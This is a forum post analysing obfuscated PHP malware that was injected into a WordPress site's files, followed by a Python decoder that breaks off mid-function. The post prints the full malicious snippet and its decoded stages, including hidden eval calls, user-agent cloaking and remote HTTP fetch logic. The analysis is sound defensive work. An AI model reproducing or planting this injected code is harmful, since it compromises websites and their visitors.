Author Topic: Deobfuscating a php hack  (Read 698 times)


Offline _moon

Deobfuscating a php hack
« on: November 12, 2015, 06:19:02 pm »
A few days ago, I stumbled upon something weird in a WordPress site: all the .php files (conf, plugins, themes, etc.) were prepended with a heavily obfuscated PHP snippet.

Honestly I don't really care how it got there in the first place; the WordPress site was outdated, so were its plugins, so I guess one of them had a vulnerability. However, I figured it would be quite interesting to check what it was doing, so I tried to deobfuscate it.

Disclaimer: I coded using PHP for the last time ten years ago, and have been pretty much uninterested in this language since then. So bear with me if this is all standard stuff :)

Here is the original snippet:
Code: [Select]
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $pdwpfcjohw 'w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{825:-t%x5c%x7825)3of:opjudovg<~%x578256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x782bfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5cr(ord($n)-1);} @error_reporting(0); pre]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fec%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x6<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5cx5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x78x7827k:!ftmf!}Z;^nbsbq%x5c%x787]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83472%x5c%x7824<!%x5c%x7825mm!>!#]y81]2<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%141%x72%164") && (!isset($GLOBA#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{sut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cdc%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyf7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%xx7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCc%x7825<#372]58y]472]37y]672]48y]#>825V<*#fopoV;hojepdoF.uofuopD#)sfec%x782f!#0#)idubn%x5c%x7860hfsq)!spd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<*)) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return 
chT7-UFOJ%x5c%x7860GB)fu7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftD4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%A)qj3hopmA%x5c%x78273qj%x5c%x74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y3827rfs%x5c%x78256~6<%x5c%x787fw6<*7825mm)%x5c%x7825%x5c%x7878:!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpu{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825if((function_exists("%x6f%142%x5f%163%x74LS["%x61%156%x75%156%x61"]))**X)ufttj%x5c%x7822)gj!|!*!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!w6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tu}#-!tussfw)%x5c%x7825c*W%x5c%x7825**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5w6Z6<.5%x5c%x7860hA%x5c%x782725)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fm3q%x5c%x7825}U;y]}R;2]},;osv-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuf]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]46x7825!>!2p%x5c%x7825!*x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x6-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubEc%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbutc%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7R%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-Sc%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2%166%x61%154%x28%151%x6d6g]273]y76]271]y7d]252]yw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x56]y81]265]y72]254]y]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y7425%x5c%x785cSFWSFT%x5c%x7860%x5c%x78%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sx5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpgx7825:>:r%x5c%x7825:|:**t%x5c%x78)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1tww**WYsboepn)%x5c%x7825bss-%x5c%x7ppde#)tutjyf%x5c%x78604%x5c%x78223x782fh%x5c%x7825:<**#57]38y]47]67ydovg!|!**#j{hnpd#)tutjyf%x5c%x7860785c1^-%x5c%x7825r%x5c%x785c2^-%x573]y76]258]y6g]273]y76]271]y7d]252]y74]2561L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-[%
x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%xz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmo!%x5c%x7825bss%x5c%x785csboe)82f#M5]DgP5]D6#<%x5c%x7825fdy>#]x7825b:<!%x5c%x7825c:>%x5c%x7825s:%u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7875:<#64y]552]e7y]#>n%x59%164%50%x22%134%x78%62%x35%165%x3a%146%x21%7q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x78N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x783>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827p985-rr.93e:5597f-s.973:8297f:2400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-rc%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fpd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5827pd%x5c%x78256<pd%x5c%76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>s:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]V,6<*)ujojR%x5c%x7827id%x5c%x7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256fmy%x5c%x7825)utjm!|!*5!%%x782272qj%x5c%x7825)7gj6<822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bdde>u%x5c%x7825V<#65,47R2;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7bfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tc%x7878pmpusut!-#j0#!%x5c%x824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x7]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x78x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uft2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQf<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)pp)1%x5c%x782f35.)1%x5c%x782f14+9**-)%x5c%x7824!>!fyqmpefpmdXA6~6<u%x5c%x78257>%
x5c%x782f7&6|7**111127-K)ebfsX%x5c%xx5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<24-%x5c%x7824*<!%x5c%x7824-%x5c%x7824g%x5c%x7827Y%x5c%x7825GFS%x5c%x7860QUUI&c_UOFHB%x5c%x2f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x78#!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%782f!**#sfmcnbs+yfeobuhofm%x5c%x7825:-5ppde:4:|:**#<!%x5c%x7825t::!>!%x5c%x7c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%57-K)fujs%x5c%x7878X6<#o%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npfr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]87827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSF#-#Y#-#D#-#W#-#C#-#O#-#*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787f%x5c%x7825)}.;%x5c%x7860UQPMSVD!K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7825c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x786>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825zji%x5c%x7878:<##:>:h%x5c%x782t%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gv]o]Y%x5c%x78257;utpI#7>%x5c%x782g_replace("%x2f%50%x2e%52%x29%57%x65","%x65,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x785,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#]#>m%x5c%x7825:|:*r%x5c%x7x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%8%x5c%x7824-%x5c%x7824]26%x5c0439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:ix5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5hpph#)zbssb!-#}#)fepmqnj!%x5eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5cpdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%%x5c%x7824-%x5c%x782h%x5c%x7825)j{hnpd!opjububE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]24525nfd>%x5c%x7825fdy<Cb*%x787
8<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x66~6<&w6<%x5c%x787fw67860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c4]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvs56<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f77827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x7829]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3fofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x57825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%8256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{6d%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7#6#)tutjyf%x5c%x786kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7]37]88y]27]28y]#%x5c%x782**2qj%x5c%x7825)hopm3qj%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48ytj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825FGTOBSUOSVUFS,6<*msv%x5c%x78257-MS#-%x5c%x7825tmw)%x5c%x7825x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%0un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5%x7825,3,j%x5c%x7825>j%x5825!*##>>X)!gjZ<#opo#>b%x5c%x7825!]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]2824Ypp3)%x5c%x7825cB%x5c%x7825iNutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;2]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); 
}ps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825c%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}24-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x765]D8]86]y31]278]y3f]55c}X%x5c%x7824<!%x5c%x7825tzw>!#2)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDP4*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x5c%x7825)s%x5c%x7825>%x5c%opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<#ufs}%x5c%x7827;mnui}&;zepc}A;~!825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74%x7824-%x5c%x7824<%x5c%x7825j,25}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xx78b%x5c%x7825ggg!>!#]y81]273]y76]258]y%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%xboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%5297e:56-%x5c%x7878r.985:52985-t.98]K4])#%x5c%x7824*<!%x5c%x78251%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c7824y4%x5c%x7824-%x5c%x7824]y/(.*)/epreg_replaceqfbyqgiljb'$idkmtooiel explode(chr((154-110)),'1748,41,781,32,1789,28,1309,69,195,39,6550,43,2697,24,8503,68,2259,57,3617,45,8051,43,234,35,6896,47,2033,29,4312,60,5776,47,4372,24,4117,60,8246,63,1400,47,5353,59,7826,60,5862,24,6518,32,3850,63,1582,34,6243,53,9411,45,1378,22,144,51,4653,26,8480,23,1490,29,92,52,7767,59,4576,52,5115,68,8638,42,5565,21,498,54,9526,42,429,69,6045,56,8838,45,986,55,2580,59,8680,34,4546,30,8196,50,7484,21,6175,36,1893,61,8094,56,392,37,6211,32,2133,42,6475,43,9251,39,0,58,4770,45,2362,52,1683,65,1843,50,269,57,8786,52,7986,65,8947,25,2483,62,4628,25,5057,58,7218,61,813,57,7195,23,3224,34,9596,54,5663,37,2237,22,4001,55,4679,67,5886,51,1259,50,1988,45,4253,59,6337,55,8883,64,4852,27,5700,21,3423,38,7037,28,1224,35,1644,39,870,60,5183,67,6101,51,5586,31,7505,39,8392,63,8972,34,1817,26,326,66,7132,43,592,30,2866,36,9773,39,7544,62,1041,46,6296,41,4457,37,8309,20,6839,57,5721,30,3156,34,3785,65,2414,69,5473,54,3558,37,5250,48,4746,24,6658,56,4056,61,1190,34,4815,37,9108,41,2105,28,9650,31,6994,43,2639,58,3662,63,5617,46,9379,32,2806,60,90
06,70,2786,20,4396,61,3913,28,3941,60,4206,47,9568,28,3190,34,8455,25,5937,57,3023,33,2062,43,6446,29,3595,22,1155,35,8571,67,6714,26,58,34,6943,51,681,37,3292,42,5823,39,552,40,9290,67,7671,46,2545,35,4879,52,7426,58,10077,29,6810,29,9743,30,6593,65,5527,38,9205,46,7175,20,9456,70,5333,20,10007,25,8329,63,5751,25,9076,32,1954,34,7065,67,2902,68,9899,69,1087,68,2745,41,3258,34,930,56,8714,26,3121,35,9681,62,4177,29,9968,39,9357,22,3334,40,4494,52,4931,62,3491,32,1447,43,7279,69,4993,64,7348,23,3374,49,8150,46,8740,46,622,59,2175,62,7717,50,3461,30,5298,35,10032,45,7371,55,2970,53,3056,65,718,63,3523,35,6740,70,5412,61,6392,54,7606,65,9851,48,1616,28,2316,46,7950,36,6152,23,3725,60,9812,39,2721,24,1519,63,7886,64,5994,51,9149,56'); $phikeisjmv=substr($pdwpfcjohw,(70252-60146),(37-30)); if (!function_exists('jzdiphfmiu')) { function jzdiphfmiu($vkqnkrobcb$iokxjmjsnh) { $mwknqctosj NULL; for($iltibddrih=0;$iltibddrih<(sizeof($vkqnkrobcb)/2);$iltibddrih++) { $mwknqctosj .= substr($iokxjmjsnh$vkqnkrobcb[($iltibddrih*2)],$vkqnkrobcb[($iltibddrih*2)+1]); } return $mwknqctosj; };} $thecjqzgwu="\x20\57\x2a\40\x69\150\x72\165\x74\171\x6e\150\x66\166\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\65\x37\55\x31\62\x30\51\x29\54\x20\143\x68\162\x28\50\x35\71\x33\55\x35\60\x31\51\x29\54\x20\152\x7a\144\x69\160\x68\146\x6d\151\x75\50\x24\151\x64\153\x6d\164\x6f\157\x69\145\x6c\54\x24\160\x64\167\x70\146\x63\152\x6f\150\x77\51\x29\51\x3b\40\x2f\52\x20\160\x6f\160\x65\167\x6a\144\x63\145\x74\40\x2a\57\x20"$xayhlwoeym=substr($pdwpfcjohw,(58620-48507),(74-62)); $xayhlwoeym($phikeisjmv$thecjqzgwuNULL); $xayhlwoeym=$thecjqzgwu$xayhlwoeym=(379-258); $pdwpfcjohw=$xayhlwoeym-1?>

The first thing I did was to decode hex and octal characters.

First there are some user-agent checks, a data string, an array, and a function definition.

Code: [Select]
<?php
if (!isset($GLOBALS["anuna"])) {
    $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
    // only mark the request when the browser is not MSIE / IE11
    if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11")))
        $GLOBALS["anuna"] = 1;
}

$pdwpfcjohw = '.....REDACTED.....';
$idkmtooiel = explode(',', '.....REDACTED.....');

// $array holds (offset, length) pairs; each pair selects a substr() of $string
// and the pieces are concatenated in order
function jzdiphfmiu($array, $string) {
    $result = NULL;
    for ($i = 0; $i < (sizeof($array) / 2); $i++) {
        $result .= substr($string, $array[($i * 2)], $array[($i * 2) + 1]);
    }
    return $result;
}
?>


Then the interesting part boils down to a hidden eval with the /e flag in preg_replace:

Code: [Select]
<?php
$phikeisjmv = "/(.*)/e";   // /e: the replacement string is evaluated as PHP code
$thecjqzgwu = " /* ihrutynhfv */ eval(str_replace('%', '\\', jzdiphfmiu($idkmtooiel,$pdwpfcjohw))); /* popewjdcet */ ";
$xayhlwoeym = "preg_replace";
$xayhlwoeym($phikeisjmv, $thecjqzgwu, NULL);
?>


I echoed what was passed to eval() after the replacement functions took place, and got another function definition and another hex/octal-obfuscated preg_replace:

Code: [Select]
<?php
function fjfgg($n) {
    return chr(ord($n) - 1);   // shift every character down by one
}
preg_replace("/(.*)/e", "eval(implode(array_map(\"fjfgg\", str_split(\".....REDACTED.....\"))));", NULL);
?>


This is where things get really interesting, but really complicated.

What I got after echoing the data passed in and decoding it is:

Code: [Select]
<?php
$t9e =
'$w9 ="/(.*)/e"; $v9 = #5656}5.6%5{6))000016,J(daerW&t$(6elihw5.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5= |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}}i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi }i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! 
eslaf( fi;)"j"(trats_boU~~~~t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W# "eval(str_replace(array" "str_replace";$slv = "strrev";$s1v="create_function" #//}9.g$9;))"46\27x\36.x\26?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261'x\361\26x.1\37x\"=r$;"351\36xa\07x\"=p$;"651.x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}# #1067|416|779|223|361# "preg_replace" array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#)0;$i
?>


It looks like most of this string can be read in reverse (as hinted by strrev anyway) and some characters are replaced using rand functions.
We can easily see very interesting strings, headers, curl... Looks like a remote access / shell drop.

However, I'm a bit stuck at this point; this code is beyond my PHP skills to fully reverse engineer.

Do you have any pointers to help me finish this?
All those moments will be lost in time, like tears in rain.
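As an added example (my own Python, not the poster's code and not the malware), here is a port of the stages the post walks through: the hex/octal escape decoding, the jzdiphfmiu() offset/length reassembly, the '%' to '\' replacement, and the fjfgg() shift, exercised on a constructed plaintext that build_sample() wraps the same way. It assumes, from the %x5c%x7825 pattern in the blob, that the str_split literal goes through PHP's string-escape processing twice (once as part of the /e replacement string, once when that string runs as code), which is why unwrap() decodes escapes twice.

```python
import re

# Constructed sample, not the poster's payload: build_sample() wraps it with
# the inverse of every stage the post walks through, unwrap() undoes them.
PLAINTEXT = 'curl_setopt($ch, CURLOPT_URL, $url); eval($body);'

def decode_php_escapes(s):
    r"""Undo PHP double-quoted "\x61\156"-style hex and octal escapes."""
    s = re.sub(r'\\x([0-9a-fA-F]{1,2})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'\\([0-7]{1,3})', lambda m: chr(int(m.group(1), 8)), s)

def rebuild_from_pairs(pairs, data):
    """Port of jzdiphfmiu(): concatenate substr(data, off, len) per pair."""
    return "".join(data[o:o + n] for o, n in zip(pairs[0::2], pairs[1::2]))

def shift_down(s):
    """fjfgg() as array_map applies it: every character minus one."""
    return "".join(chr(ord(c) - 1) for c in s)

def unwrap(pairs, data):
    """jzdiphfmiu -> str_replace('%','\\') -> PHP escape processing, applied
    twice because the str_split literal sits inside a double-quoted /e
    replacement that is compiled again as code -> fjfgg shift."""
    level2 = rebuild_from_pairs(pairs, data).replace('%', '\\')
    literal = re.search(r'str_split\("(.*?)"\)', level2).group(1)
    return shift_down(decode_php_escapes(decode_php_escapes(literal)))

SUSPICIOUS = ('eval', 'preg_replace', 'create_function', 'curl_', 'header(',
              'strrev', 'gzinflate', 'base64_')

def suspicious_calls(text):
    """Markers worth flagging in decoded output (the post noticed most of these)."""
    return sorted(m for m in SUSPICIOUS if m in text)

def scatter(s, chunk=9):
    """Sample builder only: store chunks of s in reverse order behind '##'
    filler and emit the (offset, length) pairs jzdiphfmiu() needs."""
    chunks = [s[i:i + chunk] for i in range(0, len(s), chunk)]
    data, offsets = "", {}
    for idx in reversed(range(len(chunks))):
        data += "##"
        offsets[idx] = len(data)
        data += chunks[idx]
    pairs = [v for i in range(len(chunks)) for v in (offsets[i], len(chunks[i]))]
    return pairs, data

def build_sample(plain=PLAINTEXT):
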